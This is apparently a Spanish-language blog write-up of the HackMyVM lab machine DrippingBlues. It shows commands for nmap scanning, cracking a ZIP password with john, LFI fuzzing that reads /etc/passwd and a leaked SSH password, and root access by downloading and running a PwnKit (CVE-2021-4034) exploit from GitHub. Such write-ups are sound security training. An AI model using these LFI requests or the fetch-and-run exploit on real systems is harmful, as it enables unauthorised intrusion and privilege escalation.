cd ~/blog

~/writeups/hmv/103-drippingblues.md

103 - DrippingBlues

easy Linux hmv 27-05-2024
ZIP password cracking (john)Local File Inclusion (LFI)PwnKit pkexec (CVE-2021-4034)
hackmyvm.eu/machines/machine.php?vm=DrippingBlues

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.22
 nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-27 22:55 -04
Nmap scan report for 192.168.1.22
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Por FTP anónimo descargamos respectmydrip.zip (cifrado), que crackeamos con john:

 zip2john zip_files/respectmydrip.zip > hash
 /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
072528035        (respectmydrip.zip/respectmydrip.txt)
...

Fuzzeando index.php encontramos el parámetro drip, vulnerable a LFI:

 ffuf -u 'http://192.168.1.22/index.php?FUZZ=../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fw 13
...
drip   [Status: 200, ...]
...

 curl http://192.168.1.22/index.php\?drip\=/etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash

Leyendo el archivo del robots.txt obtenemos la contraseña SSH:

 curl "http://192.168.1.22/index.php?drip=/etc/dripispowerful.html"
...
password is:
imdrippinbiatch
...

 ssh thugger@192.168.1.22
thugger@192.168.1.22's password: imdrippinbiatch
thugger@drippingblues:~$

Obtenemos la primera flag. Buscamos binarios SUID y encontramos pkexec:

thugger@drippingblues:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pkexec
...

Explotamos PwnKit:

thugger@drippingblues:/tmp$ wget -O PwnKit https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
thugger@drippingblues:/tmp$ chmod +x PwnKit
thugger@drippingblues:/tmp$ ./PwnKit
root@drippingblues:/tmp#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados